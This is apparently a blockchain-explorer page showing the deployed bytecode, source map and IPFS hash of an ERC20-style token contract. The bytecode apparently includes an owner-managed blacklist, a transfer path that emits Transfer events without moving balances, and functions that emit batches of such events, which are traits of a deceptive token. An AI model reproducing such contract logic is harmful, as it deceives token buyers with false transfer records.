0160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611f7f5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15611fe95760011515600560009054906101000a900460ff16151514611fe8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561206f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806127d96025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156120f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806126dd6023913960400191505060405180910390fd5b6120fe83612580565b6122965761210d838383612654565b6121798160405180606001604052806026815260200161276a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061220e81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2e90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555043600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008383111582906123ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015612372578082015181840152602081019050612357565b50505050905090810190601f16801561239f5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612440576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260218152602001806127b86021913960400191505060405180910390fd5b61244c82600083612654565b6124b88160405180606001604052806022815260200161270060229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506125108160045461265990919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35050565b6000600b60009054906101000a900460ff1661259f576000905061264f565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156125fa576000905061264f565b43600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054141561264a576001905061264f565b600090505b919050565b505050565b6000828211156126d1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601e8152602001807f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525060200191505060405180910390fd5b81830390509291505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e63654f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a206275726e2066726f6d20746865207a65726f206164647265737345524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220dd579ee708075cf790983b9237d48147ff23eb4b3c891ac7bf53461e6fa5e39664736f6c634300060c0033
Deployed Bytecode Sourcemap
28572:266:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17863:91;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19283:169;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;18488:201;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;15872:44;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;18164:108;;;:::i;:::-;;;;;;;;;;;;;;;;;;;20536:321;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;18065:91;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;23852:218;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;28752:83;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;22030:304;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;18811:127;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;25446:233;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;22547:305;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17962:95;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23342:109;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;18284:196;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;21360:269;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;19879:175;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;17620:125;;;:::i;:::-;;25319:119;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;18697:106;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;17753:102;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;19515:151;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;7563:244;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17863:91;17908:13;17941:5;17934:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17863:91;:::o;19283:169::-;19366:4;19383:39;19392:12;:10;:12::i;:::-;19406:7;19415:6;19383:8;:39::i;:::-;19440:4;19433:11;;19283:169;;;;:::o;18488:201::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18578:9:::1;18573:109;18597:11;;:18;;18593:1;:22;18573:109;;;18665:5;18637:9;:25;18647:11;;18659:1;18647:14;;;;;;;;;;;;;;;18637:25;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;18617:3;;;;;;;18573:109;;;;18488:201:::0;;:::o;15872:44::-;;;;;;;;;;;;;:::o;18164:108::-;18225:7;18252:12;;18245:19;;18164:108;:::o;20536:321::-;20642:4;20659:36;20669:6;20677:9;20688:6;20659:9;:36::i;:::-;20706:121;20715:6;20723:12;:10;:12::i;:::-;20737:89;20775:6;20737:89;;;;;;;;;;;;;;;;;:11;:19;20749:6;20737:19;;;;;;;;;;;;;;;:33;20757:12;:10;:12::i;:::-;20737:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;20706:8;:121::i;:::-;20845:4;20838:11;;20536:321;;;;;:::o;18065:91::-;18114:5;18139:9;;;;;;;;;;;18132:16;;18065:91;:::o;23852:218::-;23940:4;23957:83;23966:12;:10;:12::i;:::-;23980:7;23989:50;24028:10;23989:11;:25;24001:12;:10;:12::i;:::-;23989:25;;;;;;;;;;;;;;;:34;24015:7;23989:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;23957:8;:83::i;:::-;24058:4;24051:11;;23852:218;;;;:::o;28752:83::-;28800:27;28806:12;:10;:12::i;:::-;28820:6;28800:5;:27::i;:::-;28752:83;:::o;22030:304::-;22148:9;22143:184;22167:11;;:18;;22163:1;:22;22143:184;;;22242:11;;22254:1;22242:14;;;;;;;;;;;;;;;22212:45;;22217:6;22212:45;;;22225:3;22230:1;22233;22236:4;22212:45;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;22294:11;;22306:1;22294:14;;;;;;;;;;;;;;;22277:38;;22286:6;;;;;;;;;;;22277:38;;;22310:4;22277:38;;;;;;;;;;;;;;;;;;22187:3;;;;;;;22143:184;;;;22030:304;;;;;:::o;18811:127::-;18885:7;18912:9;:18;18922:7;18912:18;;;;;;;;;;;;;;;;18905:25;;18811:127;;;:::o;25446:233::-;25567:9;25562:110;25586:5;;:12;;25582:1;:16;25562:110;;;25644:3;;25648:1;25644:6;;;;;;;;;;;;;;;25625:35;;25634:5;;25640:1;25634:8;;;;;;;;;;;;;;;25625:35;;;25652:4;;25657:1;25652:7;;;;;;;;;;;;;25625:35;;;;;;;;;;;;;;;;;;25600:3;;;;;;;25562:110;;;;25446:233;;;;;;:::o;22547:305::-;22667:9;22662:183;22686:11;;:18;;22682:1;:22;22662:183;;;22761:11;;22773:1;22761:14;;;;;;;;;;;;;;;22731:45;;22736:6;22731:45;;;22744:1;22747:3;22752:4;22758:1;22731:45;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;22821:6;;;;;;;;;;;22796:37;;22805:11;;22817:1;22805:14;;;;;;;;;;;;;;;22796:37;;;22829:3;22796:37;;;;;;;;;;;;;;;;;;22706:3;;;;;;;22662:183;;;;22547:305;;;;;:::o;17962:95::-;18009:13;18042:7;18035:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17962:95;:::o;23342:109::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23411:1:::1;23402:6;;:10;;;;;;;;;;;;;;;;;;23439:4;23423:10;:13;23434:1;23423:13;;;;;;;;;;;;;;;;:20;;;;;;;;;;;;;;;;;;23342:109:::0;:::o;18284:196::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18370:9:::1;18365:108;18389:11;;:18;;18385:1;:22;18365:108;;;18457:4;18429:9;:25;18439:11;;18451:1;18439:14;;;;;;;;;;;;;;;18429:25;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;18409:3;;;;;;;18365:108;;;;18284:196:::0;;:::o;21360:269::-;21453:4;21470:129;21479:12;:10;:12::i;:::-;21493:7;21502:96;21541:15;21502:96;;;;;;;;;;;;;;;;;:11;:25;21514:12;:10;:12::i;:::-;21502:25;;;;;;;;;;;;;;;:34;21528:7;21502:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;21470:8;:129::i;:::-;21617:4;21610:11;;21360:269;;;;:::o;19879:175::-;19965:4;19982:42;19992:12;:10;:12::i;:::-;20006:9;20017:6;19982:9;:42::i;:::-;20042:4;20035:11;;19879:175;;;;:::o;17620:125::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17712:25:::1;;;;;;;;;;;17711:26;17683:25;;:54;;;;;;;;;;;;;;;;;;17620:125::o:0;25319:119::-;25420:3;25404:26;;25413:5;25404:26;;;25425:4;25404:26;;;;;;;;;;;;;;;;;;25319:119;;;:::o;18697:106::-;18753:4;18777:9;:18;18787:7;18777:18;;;;;;;;;;;;;;;;;;;;;;;;;18770:25;;18697:106;;;:::o;17753:102::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17843:4:::1;17821:10;:19;17832:7;17821:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;17753:102:::0;:::o;19515:151::-;19604:7;19631:11;:18;19643:5;19631:18;;;;;;;;;;;;;;;:27;19650:7;19631:27;;;;;;;;;;;;;;;;19624:34;;19515:151;;;;:::o;7563:244::-;7169:12;:10;:12::i;:::-;7158:23;;:7;:5;:7::i;:::-;:23;;;7150:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7672:1:::1;7652:22;;:8;:22;;;;7644:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7762:8;7733:38;;7754:6;::::0;::::1;;;;;;;;7733:38;;;;;;;;;;;;7791:8;7782:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;7563:244:::0;:::o;10210:179::-;10268:7;10288:9;10304:1;10300;:5;10288:17;;10329:1;10324;:6;;10316:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10380:1;10373:8;;;10210:179;;;;:::o;5734:106::-;5787:15;5822:10;5815:17;;5734:106;:::o;27524:346::-;27643:1;27626:19;;:5;:19;;;;27618:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27724:1;27705:21;;:7;:21;;;;27697:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27808:6;27778:11;:18;27790:5;27778:18;;;;;;;;;;;;;;;:27;27797:7;27778:27;;;;;;;;;;;;;;;:36;;;;27846:7;27830:32;;27839:5;27830:32;;;27855:6;27830:32;;;;;;;;;;;;;;;;;;27524:346;;;:::o;7319:89::-;7367:7;7394:6;;;;;;;;;;;7387:13;;7319:89;:::o;24560:751::-;24662:9;:20;24672:9;24662:20;;;;;;;;;;;;;;;;;;;;;;;;;:41;;;;24686:9;:17;24696:6;24686:17;;;;;;;;;;;;;;;;;;;;;;;;;24662:41;24658:83;;;24732:4;24713:23;;:15;;;;;;;;;;;:23;;;24705:36;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24658:83;24778:1;24760:20;;:6;:20;;;;24752:70;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24862:1;24841:23;;:9;:23;;;;24833:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24922:15;24930:6;24922:7;:15::i;:::-;24917:336;;24954:47;24975:6;24983:9;24994:6;24954:20;:47::i;:::-;25036:71;25058:6;25036:71;;;;;;;;;;;;;;;;;:9;:17;25046:6;25036:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;25016:9;:17;25026:6;25016:17;;;;;;;;;;;;;;;:91;;;;25145:32;25170:6;25145:9;:20;25155:9;25145:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;25122:9;:20;25132:9;25122:20;;;;;;;;;;;;;;;:55;;;;25229:12;25192:23;:34;25216:9;25192:34;;;;;;;;;;;;;;;:49;;;;24917:336;25285:9;25268:35;;25277:6;25268:35;;;25296:6;25268:35;;;;;;;;;;;;;;;;;;24560:751;;;:::o;12211:166::-;12297:7;12330:1;12325;:6;;12333:12;12317:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12368:1;12364;:5;12357:12;;12211:166;;;;;:::o;26012:418::-;26115:1;26096:21;;:7;:21;;;;26088:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26168:49;26189:7;26206:1;26210:6;26168:20;:49::i;:::-;26251:68;26274:6;26251:68;;;;;;;;;;;;;;;;;:9;:18;26261:7;26251:18;;;;;;;;;;;;;;;;:22;;:68;;;;;:::i;:::-;26230:9;:18;26240:7;26230:18;;;;;;;;;;;;;;;:89;;;;26345:24;26362:6;26345:12;;:16;;:24;;;;:::i;:::-;26330:12;:39;;;;26411:1;26385:37;;26394:7;26385:37;;;26415:6;26385:37;;;;;;;;;;;;;;;;;;26012:418;;:::o;17209:403::-;17266:4;17290:25;;;;;;;;;;;17285:47;;17325:5;17318:12;;;;17285:47;17439:10;:20;17450:8;17439:20;;;;;;;;;;;;;;;;;;;;;;;;;17435:41;;;17469:5;17462:12;;;;17435:41;17528:12;17491:23;:33;17515:8;17491:33;;;;;;;;;;;;;;;;:49;17488:92;;;17564:4;17557:11;;;;17488:92;17599:5;17592:12;;17209:403;;;;:::o;28473:92::-;;;;:::o;10664:158::-;10722:7;10755:1;10750;:6;;10742:49;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10813:1;10809;:5;10802:12;;10664:158;;;;:::o
Swarm Source
ipfs://dd579ee708075cf790983b9237d48147ff23eb4b3c891ac7bf53461e6fa5e396
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 31 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.